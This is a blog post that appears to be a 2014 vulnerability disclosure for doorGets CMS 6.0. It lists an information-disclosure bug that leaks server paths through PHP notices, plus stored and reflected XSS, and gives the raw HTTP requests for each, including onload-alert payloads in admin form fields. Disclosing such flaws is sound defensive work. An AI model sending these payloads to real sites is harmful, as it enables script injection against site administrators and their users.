Friday, 28 February 2014

[EN] Multiple vulnerabilities in doorGets 6.0

# ==============================================================
# Title ...|
Multiple vulnerabilities in doorGets 6.0
# Version .| doorGets 6.0
# Date ....| 27.02.2014
# Found ...| HauntIT Blog
# Home ....| http://sourceforge.net
# ==============================================================


# ==============================================================
# 1. Information disclosure bug

---<request>---
GET /k/cms/door/dg-admin/?controller=modulevideo&uri='`"%3b--#%%2f%2a HTTP/1.1
Host: 10.149.14.62(...)
Connection: close
---<request>---


---<response>---
Notice: Undefined variable: cResultsInt in /home/k/public_html/cms/door/cache/template/modules/bigadmin/modulevideo/bigadmin_modulevideo_index.tpl.php on line 90

Notice: Undefined variable: cResultsInt in /home/k/public_html/cms/door/cache/template/modules/bigadmin/modulevideo/bigadmin_modulevideo_index.tpl.php on line 90
video By Notice: Undefined variable: per in /home/k/public_html/cms/door/cache/template/modules/bigadmin/modulevideo/bigadmin_modulevideo_index.tpl.php on line 95
>10 Notice: Undefined variable: per in /home/k/public_html/cms/door/cache/template/modules/bigadmin/modulevideo/bigadmin_modulevideo_index.tpl.php on line 96
>20 Notice: Undefined variable: per in /home/k/public_html/cms/door/cache/template/modules/bigadmin/modulevideo/bigadmin_modulevideo_index.tpl.php on line 97
>50 Notice: Undefined variable: per in /home/k/public_html/cms/door/cache/template/modules/bigadmin/modulevideo/bigadmin_modulevideo_index.tpl.php on line 98
>100

Notice: Undefined variable: urlPageGo in /home/k/public_html/cms/door/cache/template/modules/bigadmin/modulevideo/bigadmin_modulevideo_index.tpl.php on line 103
---<response>---

# ==============================================================
# 2. Persistent XSS

---<request>---
POST /k/cms/door/dg-admin/?controller=modulepage&uri=asdasd&lg=en HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 294

modulepage_edit_titre=asdasd&modulepage_edit_article_tinymce=</textarea><body onload=alert(123)>&modulepage_edit_meta_titre=asdasd&modulepage_edit_meta_description=asdasd&modulepage_edit_meta_keys=&modulepage_edit_partage=1&modulepage_edit_submit=Save
---<request>---

# ==============================================================
# 3. XSS

---<request>---
POST /k/cms/door/dg-admin/?controller=configuration&action=siteweb HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 475

configuration_siteweb_statut=1&configuration_siteweb_statut_ip='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&configuration_siteweb_statut_tinymce=&configuration_siteweb_title=startowa&configuration_siteweb_slogan=startowa&configuration_siteweb_description=startowa&configuration_siteweb_copyright=startowa&configuration_siteweb_year=2014&configuration_siteweb_keywords=startowa&configuration_siteweb_id_facebook=&configuration_siteweb_id_disqus=&configuration_siteweb_submit=Save
---<request>---


# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/

No comments:

Post a comment

What do You think...?